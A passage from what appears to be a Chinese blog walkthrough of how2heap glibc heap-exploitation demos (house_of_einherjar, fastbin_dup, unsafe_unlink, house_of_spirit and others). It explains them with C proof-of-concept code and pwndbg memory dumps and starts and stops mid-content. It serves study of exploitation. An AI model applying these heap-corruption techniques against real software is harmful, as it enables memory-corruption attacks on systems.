<li>新分配一块内存,大小需要超过刚才被释放的大小0x202000,因为在前一步释放的过程中,mmapthreshold被更新成了0x202000。此时这块新分配的内存,覆盖掉了之前munmap的内存。</li> <li>获取chunk2和overlappingChunk之间的距离,最后通过改写overlappingchunk的数据来改写chunk2的数据,完成攻击</li> </ol> <p>参考:<a href="http://tukan.farm/2016/07/27/munmap-madness/">munmap madness</a></p> <h2 id="house_of_einherjar">house_of_einherjar</h2> <p>这里是利用off-by-one来改写chunk的pre_inuse字段,并通过改写prev size和size字段来绕过检查,最终导致free时将块合并到目标地址,并通过下一次的malloc来获取目标地址内存。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Credit to st4g3r for publishing this technique The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc() This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak. */</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> <span class="n">setbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> <span class="c1">// 1</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Welcome to House of Einherjar!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Tested in Ubuntu 16.04 64bit.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">a</span><span class="p">;</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">b</span><span class="p">;</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">d</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">We allocate 0x38 bytes for 'a'</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x38</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"a: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="kt">int</span> <span class="n">real_a_size</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">real_a_size</span><span class="p">);</span> <span class="c1">// create a fake chunk</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">We create a fake chunk wherever we want, in this case we'll create the chunk on the stack</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"However, you can also create the chunk in the heap or the bss, as long as you know its address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"(although we could do the unsafe unlink technique here in some scenarios)</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="kt">size_t</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">6</span><span class="p">];</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x100</span><span class="p">;</span> <span class="c1">// prev_size is now used and must equal fake_chunk's size to pass P-&gt;bk-&gt;size == P-&gt;prev_size</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x100</span><span class="p">;</span> <span class="c1">// size of the chunk just needs to be small enough to stay in the small bin</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span> <span class="n">fake_chunk</span><span class="p">;</span> <span class="c1">// fwd</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span> <span class="n">fake_chunk</span><span class="p">;</span> <span class="c1">// bck</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span> <span class="n">fake_chunk</span><span class="p">;</span> <span class="c1">//fwd_nextsize</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span> <span class="n">fake_chunk</span><span class="p">;</span> <span class="c1">//bck_nextsize</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Our fake chunk at %p looks like:</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"prev_size (not used): %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"size: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"fwd: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"bck: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">3</span><span class="p">]);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"fwd_nextsize: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">4</span><span class="p">]);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"bck_nextsize: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">5</span><span class="p">]);</span> <span class="c1">// 2</span> <span class="cm">/* In this case it is easier if the chunk size attribute has a least significant byte with * a value of 0x00. The least significant byte of this will be 0x00, because the size of * the chunk includes the amount requested plus some amount required for the metadata. */</span> <span class="n">b</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0xf8</span><span class="p">);</span> <span class="kt">int</span> <span class="n">real_b_size</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">b</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">We allocate 0xf8 bytes for 'b'.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"b: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">b</span><span class="p">);</span> <span class="kt">uint64_t</span><span class="o">*</span> <span class="n">b_size_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="cm">/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">b.size: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="n">b_size_ptr</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"b.size is: (0x100) | prev_inuse = 0x101</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"We overflow 'a' with a single null byte into the metadata of 'b'</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">a</span><span class="p">[</span><span class="n">real_a_size</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"b.size: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="n">b_size_ptr</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"This is easiest if b.size is a multiple of 0x100 so you "</span> <span class="s">"don't change the size of b, only its prev_inuse bit</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"If it had been modified, we would need a fake chunk inside "</span> <span class="s">"b where it will try to consolidate the next chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// 3</span> <span class="c1">// Write a fake prev_size to the end of a</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">We write a fake prev_size to the last %lu bytes of a so that "</span> <span class="s">"it will consolidate with our fake chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">));</span> <span class="kt">size_t</span> <span class="n">fake_size</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)((</span><span class="n">b</span><span class="o">-</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">fake_chunk</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Our fake prev_size will be %p - %p = %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">b</span><span class="o">-</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">,</span> <span class="n">fake_size</span><span class="p">);</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">a</span><span class="p">[</span><span class="n">real_a_size</span><span class="o">-</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">)]</span> <span class="o">=</span> <span class="n">fake_size</span><span class="p">;</span> <span class="c1">//Change the fake chunk's size to reflect b's new prev_size</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Modify fake chunk's size to reflect b's new prev_size</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">fake_size</span><span class="p">;</span> <span class="c1">// 4</span> <span class="c1">// free b and it will consolidate with our fake chunk</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">b</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Our fake chunk size is now %#lx (b.size + fake_prev_size)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">fake_chunk</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="c1">//if we allocate another chunk before we free b we will need to </span> <span class="c1">//do two things: </span> <span class="c1">//1) We will need to adjust the size of our fake chunk so that</span> <span class="c1">//fake_chunk + fake_chunk's size points to an area we control</span> <span class="c1">//2) we will need to write the size of our fake chunk</span> <span class="c1">//at the location we control. </span> <span class="c1">//After doing these two things, when unlink gets called, our fake chunk will</span> <span class="c1">//pass the size(P) == prev_size(next_chunk(P)) test. </span> <span class="c1">//otherwise we need to make sure that our fake chunk is up against the</span> <span class="c1">//wilderness</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Now we can call malloc() and it will begin in our fake chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">d</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x200</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Next malloc(0x200) is at %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">d</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>代码分为4个步骤:</p> <ol> <li> <p>a指向一块0x38的内存,在栈上构造了一个fake chunk,并改写其pre_size,size,fd,bk,fd_nextsize,bk_nextsize字段</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; x/8gx fake_chunk 0x7fffffffdd70: 0x0000000000000100 0x0000000000000100 0x7fffffffdd80: 0x00007fffffffdd70 0x00007fffffffdd70 0x7fffffffdd90: 0x00007fffffffdd70 0x00007fffffffdd70 0x7fffffffdda0: 0x00007fffffffde90 0x8e07974ff9e77c00 </code></pre></div> </div> </li> <li> <p>b指向一块0xf8实际0x100的内存,并通过溢出a来改写b的size字段,使其pre_inuse字段为0。</p> </li> <li> <p>计算chunk(b)至fake chunk的距离,并将其写入a的最后一个字节,即b的prev_size字段,同时也需要改写fake chunk的size字段,绕过检查</p> </li> <li> <p>最后,释放b,造成b与fake chunk合并,并通过malloc获取fake chunk的内存块</p> </li> </ol> Tue, 08 Dec 2020 00:00:00 +0000 https://clot.github.io//how2heap-2 https://clot.github.io/how2heap-2 Heap Exploitation - how2heap 1 <p><a href="https://github.com/shellphish/how2heap">how2heap</a></p> <p>引用的代码中只摘取了关键的部分。</p> <h2 id="first_fit">first_fit</h2> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kt">char</span><span class="o">*</span> <span class="n">a</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x512</span><span class="p">);</span> <span class="kt">char</span><span class="o">*</span> <span class="n">b</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x256</span><span class="p">);</span> <span class="kt">char</span><span class="o">*</span> <span class="n">c</span><span class="p">;</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="s">"this is A!"</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="n">c</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x500</span><span class="p">);</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="s">"this is C!"</span><span class="p">);</span> </code></pre></div></div> <p>a释放后未重置为NULL,c被分配的内存就是a原本指向的内存,导致原指针a指向的数据被更改。也就是uaf的漏洞利用。</p> <h2 id="calc_tcache_idx">calc_tcache_idx</h2> <p>这里主要介绍了tcache的index的算法逻辑。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> IDX <span class="o">=</span> <span class="o">(</span>CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1<span class="o">)</span> / MALLOC_ALIGNMENT On a 64 bit system the current values are: MINSIZE: 0x20 MALLOC_ALIGNMENT: 0x10 So we get the following equation: IDX <span class="o">=</span> <span class="o">(</span>CHUNKSIZE - 0x11<span class="o">)</span> / 0x10 BUT be AWARE that CHUNKSIZE is not the x <span class="k">in </span>malloc<span class="o">(</span>x<span class="o">)</span> It is calculated as follows: IF x + SIZE_SZ + MALLOC_ALIGN_MASK &lt; MINSIZE<span class="o">(</span>0x20<span class="o">)</span> CHUNKSIZE <span class="o">=</span> MINSIZE <span class="o">(</span>0x20<span class="o">)</span> ELSE: CHUNKSIZE <span class="o">=</span> <span class="o">(</span>x + SIZE_SZ + MALLOC_ALIGN_MASK<span class="o">)</span> &amp; ~MALLOC_ALIGN_MASK<span class="o">)</span> <span class="o">=&gt;</span> CHUNKSIZE <span class="o">=</span> <span class="o">(</span>x + 0x8 + 0xf<span class="o">)</span> &amp; ~0xf </code></pre></div></div> <h2 id="fastbin_dup">fastbin_dup</h2> <p>主要描述double free的漏洞利用。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="o">*</span><span class="n">a</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="kt">int</span> <span class="o">*</span><span class="n">b</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="kt">int</span> <span class="o">*</span><span class="n">c</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">b</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="n">a</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="n">b</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="n">c</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> </code></pre></div></div> <p>a,b,c被分配了8字节,释放后会被放到fastbin中。释放a后:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; fastbins fastbins 0x20: 0x602000 ◂— 0x0 </code></pre></div></div> <p>释放b后:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; fastbins fastbins 0x20: 0x602020 —▸ 0x602000 ◂— 0x0 </code></pre></div></div> <p>再次释放a后:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; fastbins fastbins 0x20: 0x602000 —▸ 0x602020 ◂— 0x602000 </code></pre></div></div> <p>可以看到此时fastbins中有两个a的地址,之后的三次malloc就会导致a的地址被使用两次。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1st malloc<span class="o">(</span>8<span class="o">)</span>: 0x957010 2nd malloc<span class="o">(</span>8<span class="o">)</span>: 0x957030 3rd malloc<span class="o">(</span>8<span class="o">)</span>: 0x957010 </code></pre></div></div> <h2 id="fastbin_dup_into_stack">fastbin_dup_into_stack</h2> <p>基于上一个例子,在double free后构造了一个fake chunk。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="o">*</span><span class="n">a</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="kt">int</span> <span class="o">*</span><span class="n">b</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="kt">int</span> <span class="o">*</span><span class="n">c</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">b</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="n">a</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="n">b</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="n">c</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="c1">// d指向了a的内存</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="o">*</span><span class="n">d</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="c1">// 第二次malloc用掉了b的内存</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"2nd malloc(8): %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">));</span> <span class="c1">// 栈上的变量置为0x20,这步相当于设置了chunksize</span> <span class="n">stack_var</span> <span class="o">=</span> <span class="mh">0x20</span><span class="p">;</span> <span class="c1">// 此时更改d的值,相当于更改了fastbin中剩下的chunk的fd, 这里被赋值为stack_var的地址减去d的大小(8)</span> <span class="c1">// 所以fd+8= 20 就是 fake chunk的大小</span> <span class="c1">// 这步结束之后,fastbin中就多了一个指向 &amp;stack_var - 8 地址的fake chunk</span> <span class="o">*</span><span class="n">d</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">)</span> <span class="p">(((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">stack_var</span><span class="p">)</span> <span class="o">-</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">d</span><span class="p">));</span> <span class="c1">// 这步使用了 fastbin中原本a所指向的chunk</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"3rd malloc(8): %p, putting the stack address on the free list</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">));</span> <span class="c1">// 这步就使用了fake chunk</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"4th malloc(8): %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">));</span> </code></pre></div></div> <p>具体分析写在注释内。目的是利用double free构造一个fake chunk来完成任意地址的读写,这次是使用的是栈上的地址。</p> <h2 id="fastbin_dup_consolidate">fastbin_dup_consolidate</h2> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span><span class="o">*</span> <span class="n">p1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x40</span><span class="p">);</span> <span class="kt">void</span><span class="o">*</span> <span class="n">p2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x40</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">p1</span><span class="p">);</span> <span class="kt">void</span><span class="o">*</span> <span class="n">p3</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x400</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">p1</span><span class="p">);</span> </code></pre></div></div> <p>第一次free后:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; fastbins fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x602000 ◂— 0x0 </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">p3</code>malloc后,触发了<code class="language-plaintext highlighter-rouge">malloc_consolidate()</code>,导致fastbin中的chunk被移到对应的smallbin中。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; fastbins fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x0 0x80: 0x0 pwndbg&gt; smallbins smallbins 0x50: 0x602000 —▸ 0x7ffff7dd1bb8 <span class="o">(</span>main_arena+152<span class="o">)</span> ◂— 0x602000 </code></pre></div></div> <p>此时<code class="language-plaintext highlighter-rouge">free(p1)</code>可以绕过fastbin中topchunk的检查,又新增一个p1所指向的chunk。导致smallbin和fastbin中同时包含两个相同的chunk,造成double free漏洞。</p> <h2 id="unsafe_unlink">unsafe_unlink</h2> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">uint64_t</span> <span class="o">*</span><span class="n">chunk0_ptr</span><span class="p">;</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">malloc_size</span> <span class="o">=</span> <span class="mh">0x80</span><span class="p">;</span> <span class="c1">//we want to be big enough not to use fastbins</span> <span class="kt">int</span> <span class="n">header_size</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// 1</span> <span class="n">chunk0_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="n">malloc_size</span><span class="p">);</span> <span class="c1">//chunk0</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">chunk1_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="n">malloc_size</span><span class="p">);</span> <span class="c1">//chunk1</span> <span class="c1">// 2</span> <span class="n">chunk0_ptr</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">chunk0_ptr</span><span class="o">-</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="o">*</span><span class="mi">3</span><span class="p">);</span> <span class="n">chunk0_ptr</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">chunk0_ptr</span><span class="o">-</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">);</span> <span class="c1">// 3</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">chunk1_hdr</span> <span class="o">=</span> <span class="n">chunk1_ptr</span> <span class="o">-</span> <span class="n">header_size</span><span class="p">;</span> <span class="n">chunk1_hdr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">malloc_size</span><span class="p">;</span> <span class="n">chunk1_hdr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="mi">1</span><span class="p">;</span> <span class="c1">// 4</span> <span class="n">free</span><span class="p">(</span><span class="n">chunk1_ptr</span><span class="p">);</span> <span class="c1">// 5</span> <span class="kt">char</span> <span class="n">victim_string</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">victim_string</span><span class="p">,</span><span class="s">"Hello!~"</span><span class="p">);</span> <span class="n">chunk0_ptr</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="n">victim_string</span><span class="p">;</span> <span class="n">chunk0_ptr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x4141414142424242LL</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>代码被划分成5个步骤,具体操作见下图:</p> <p><img src="../assets/images/unsafe_unlink.png" alt="unsafe_unlink_p1" /></p> <p>第二步伪装了一个fake chunk, 其fd-&gt;bk = 0x603010, bk-&gt;fd = 0x603010, 为了绕过<code class="language-plaintext highlighter-rouge">fd-&gt;bk != p || bk-&gt;fd != p</code>的检查。</p> <p>第三步更改了chunk1的header信息,使代码认为前一个块是0x80大小的空闲块,导致<code class="language-plaintext highlighter-rouge">free(chun1_ptr)</code>时,触发fake_chunk的unlink。</p> <p>第四步free,最终造成chunk0_ptr指向了0x602058,此时 <code class="language-plaintext highlighter-rouge">&amp;chunk0_ptr == chunk0_ptr[3]</code></p> <p>第五步尝试改写某块内存数据,<code class="language-plaintext highlighter-rouge">chunk0_ptr[3] = &amp;victim_string</code>, 这时chunk0_ptr指向了victim_string 的地址;随后改写chunk0_ptr[0],导致victim_string内容被更改。</p> <h2 id="house_of_spirit">house_of_spirit</h2> <p>主要目的是伪造chunk,绕过free的检查,然后调用malloc使用这块内存。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// 1</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="o">*</span><span class="n">a</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">fake_chunks</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="n">__attribute__</span> <span class="p">((</span><span class="n">aligned</span> <span class="p">(</span><span class="mi">16</span><span class="p">)));</span> <span class="c1">// 2</span> <span class="n">fake_chunks</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x40</span><span class="p">;</span> <span class="c1">// this is the size</span> <span class="c1">// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8</span> <span class="n">fake_chunks</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x1234</span><span class="p">;</span> <span class="c1">// nextsize</span> <span class="c1">// 3</span> <span class="n">a</span> <span class="o">=</span> 